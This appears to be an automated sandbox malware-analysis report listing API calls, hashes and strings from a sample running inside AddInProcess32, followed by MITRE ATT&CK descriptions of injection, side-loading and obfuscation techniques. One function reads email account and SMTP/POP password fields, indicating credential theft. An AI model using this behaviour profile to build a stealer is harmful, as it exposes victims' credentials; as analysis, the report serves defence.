APIs

CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4

Function 0040642C Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5

Function 004044A7 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?,00000000,F66BE5A2,00000000,00000000), ref: 004044CB

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: 4d7b33c0f443fd34e1b412248ee3a3a873a37a73c8fd0d440c03b52d081651e8
Instruction ID: e6a1e737d40be81796f932fb1ea6dd5b05bd2579ff383e5fb5a00b3a8c54de51
Opcode Fuzzy Hash: 4d7b33c0f443fd34e1b412248ee3a3a873a37a73c8fd0d440c03b52d081651e8
Instruction Fuzzy Hash: 52D0C27604410DBFDF025EE1DC05CAB3F6EEB48354B408425BE2895021D637DA71ABA5

Function 004049B3 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SHGetValueW.SHLWAPI(?,?,?,?,?,?,00000002,DC1011D7,00000000,00000000), ref: 004049D8

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: d2b5c774d03033d136a946971d24419cad296dffbc8af53813a044fec6ac893d
Instruction ID: 49132b90e07f175002bb52db16c83daeb6fc20f74050e769a3614ef6a11dfcc0
Opcode Fuzzy Hash: d2b5c774d03033d136a946971d24419cad296dffbc8af53813a044fec6ac893d
Instruction Fuzzy Hash: 71D0923214020DBBDF026ED1DC02FAA3F2AAB09758F104014FB18280A1C677D631AB95

Function 00404EEA Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON

Download Yara Rule

APIs

send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98

Function 004049DC Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

SHEnumKeyExW.SHLWAPI(?,?,?,?,00000002,ECA4834B,00000000,00000000), ref: 004049FB

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: c447628955f84b1dbba2996d5b83f9d73ffd86954af03f25284de3baf63e54d0
Instruction ID: fb20b8ae34c3d99b6a2ec1f59af3280c7c0bbdac25ffdbb9458fe1f208d0831b
Opcode Fuzzy Hash: c447628955f84b1dbba2996d5b83f9d73ffd86954af03f25284de3baf63e54d0
Instruction Fuzzy Hash: 45D0023114430D7BEF115ED1DC06F597F1ABB49B54F104455BB18680E19673A6305755

Function 00403BD0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

MoveFileExW.KERNEL32(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8

Function 00404A19 Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658

Function 00403C08 Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Function 00408B2C Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(?,00000000,E0CF5891,00000000,00000000), ref: 00408B41

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 450bda5b085385e41399d185e0c6d92315b9743f5e19a8ad8642e29fe69941a3
Instruction ID: 291ca984118c00001a410e8fe814b9ebecee15bf7cc635df9db1cfcd8d33b31d
Opcode Fuzzy Hash: 450bda5b085385e41399d185e0c6d92315b9743f5e19a8ad8642e29fe69941a3
Instruction Fuzzy Hash: 0EB092B004820C3EAE002EF19C05C3B3E8DEA4454870044757E0CE5051EA36DE1110A5

Function 00403BEF Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4

Function 00403BB7 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Function 00403B64 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID:
API String ID: 1174141254-0
Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Function 00404DE5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

closesocket.WS2_32(00404EB0), ref: 00404DEB

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8

Function 004044EE Relevance: 1.3, APIs: 1, Instructions: 77COMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Part of subcall function 004044A7: GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?,00000000,F66BE5A2,00000000,00000000), ref: 004044CB

GetLastError.KERNEL32 ref: 00404585

Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateErrorFreeLastPrivateProfileString
String ID:
API String ID: 4065557613-0
Opcode ID: 07df6e299c1e51546a6fce8a11171accc3f3248d34e9f20b559e9614b6af16c3
Instruction ID: 4921b4961515552709d35feb502e82dc384c9b3b90426e204c6f6ec5e0b55acd
Opcode Fuzzy Hash: 07df6e299c1e51546a6fce8a11171accc3f3248d34e9f20b559e9614b6af16c3
Instruction Fuzzy Hash: 901157B26011043BEB249EA9AD46F7FB768DF84368F10413FFB05E61D0EA789C00069C

Function 00403F9E Relevance: 1.3, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8

Function 00403C40 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4

Function 00406472 Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9

Non-executed Functions

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON

Download Yara Rule

Strings

EmailAddress, xrefs: 0040D074
SmtpAccount, xrefs: 0040D0FA
SmtpPassword, xrefs: 0040D117
PopPassword, xrefs: 0040D0D0
PopAccount, xrefs: 0040D0B6
SmtpPort, xrefs: 0040D0EB
PopServer, xrefs: 0040D099
SmtpServer, xrefs: 0040D0DC
Technology, xrefs: 0040D08D
PopPort, xrefs: 0040D0A7

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: QueryValue
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 3660427363-2111798378
Opcode ID: b68ba21e4a3a0049e44e4174c680ab59653fe0191a5276204f50c9857b9783d9
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: b68ba21e4a3a0049e44e4174c680ab59653fe0191a5276204f50c9857b9783d9
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Function 0040317B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

